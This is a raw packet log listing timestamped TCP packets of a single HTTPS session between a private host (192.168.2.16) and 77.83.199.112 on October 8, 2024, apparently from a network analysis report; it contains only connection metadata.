Oct 8, 2024 15:23:45.340322018 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.340358019 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.340373993 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.340607882 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.340629101 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.340687037 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.340694904 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.340739965 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.341131926 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.341155052 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.341213942 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.341223001 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.341273069 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.341586113 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.341607094 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.341669083 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.341679096 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.341737032 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.364181042 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.364202023 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.364304066 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.364314079 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.364365101 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.429792881 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.429811954 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.429891109 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.429913998 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.429961920 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.430025101 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.430042982 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.430098057 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.430107117 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.430145025 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.430550098 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.430566072 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.430624008 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.430632114 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.430695057 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.431102037 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.431119919 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.431164026 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.431171894 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.431195974 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.431210995 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.431457996 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.431480885 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.431545019 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.431552887 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.431595087 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.432043076 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.432060003 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.432111979 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.432120085 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.432159901 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.433012962 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.433029890 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.433098078 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.433106899 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.433166981 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.454869032 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.454904079 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.454957962 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.454967976 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.455024958 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.455050945 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.522619009 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.522639990 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.522707939 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.522743940 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.522764921 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.522784948 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.523231030 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.523252964 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.523307085 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.523318052 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.523627996 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.523648024 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.523662090 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.523669958 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.523683071 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.523725033 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.524110079 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.524116993 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.524167061 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.524177074 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.524207115 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.524234056 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.524741888 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.524765968 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.524823904 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.524825096 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.524838924 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.524854898 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.524879932 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.524925947 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.524934053 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.524976969 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.525557995 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.525573969 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.525626898 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.525635958 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.525674105 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.545907021 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.545938015 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.546032906 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.546045065 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.546088934 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.613477945 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.613507032 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.613615990 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.613643885 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.613701105 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.613982916 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.614000082 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.614048958 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.614058971 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.614109993 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.614397049 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.614413977 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.614464998 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.614474058 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.614500046 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.614522934 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.614782095 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.614808083 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.614851952 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.614861965 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.614892960 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.614922047 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.615272999 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.615292072 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.615348101 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.615356922 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.615407944 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.615885973 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.615904093 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.615962982 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.615971088 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.616014957 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.616431952 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.616447926 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.616506100 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.616514921 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.616569996 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.636346102 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.636363029 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.636482954 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.636499882 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.636553049 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.713612080 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.713638067 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.713774920 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.713799000 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.713846922 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.714013100 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.714030027 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.714107990 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.714114904 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.714174986 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.714590073 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.714608908 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.714664936 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.714672089 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.714708090 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.715054035 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.715073109 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.715197086 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.715203047 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.715250969 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.715496063 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.715512037 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.715575933 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.715583086 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.715629101 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.715970039 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.715986967 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.716078043 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.716085911 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.716133118 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.716317892 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.716336012 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.716406107 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.716412067 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.716463089 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.727261066 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.727298021 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.727436066 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.727464914 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.727617025 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.804672003 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.804702044 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.804799080 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.804810047 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.804852962 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.804903984 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.804920912 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.804976940 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.804985046 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.805042982 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.805377960 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.805406094 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.805460930 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.805469036 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.805509090 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.805638075 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.805655003 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.805715084 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.805722952 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.805763006 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.806118011 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.806133986 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.806190014 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.806200981 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.806242943 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.806492090 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.806514025 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.806576014 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.806583881 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.806648970 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.806829929 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.806849957 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.806917906 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.806926012 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.806976080 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.819030046 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.170944929 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.170954943 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.170970917 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.170993090 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.171634912 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.171679974 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.171713114 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.171721935 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.171746969 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.171767950 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.171850920 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.171900034 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.171925068 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.171931982 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.171968937 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.171997070 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.182518005 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.182562113 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.182636023 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.182646036 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.182683945 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.259094954 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.259121895 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.259310007 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.259345055 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.259433985 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.259495974 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.259512901 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.259576082 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.259582996 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.259906054 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.259948969 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.259989977 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.259999037 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.260031939 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.260094881 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.260163069 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.260191917 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.260221958 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.260227919 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.260260105 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.260294914 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.260946989 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.260965109 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.261051893 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.261060953 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.261142015 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.261845112 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.261862040 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.261926889 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.261934042 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.261990070 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.262360096 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.262376070 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.262456894 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.262468100 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.262512922 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.273252010 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.273286104 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.273369074 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.273395061 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.273447990 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.349980116 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.350034952 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.350155115 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.350167990 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.350209951 CEST49707443192.168.2.1677.83.199.112
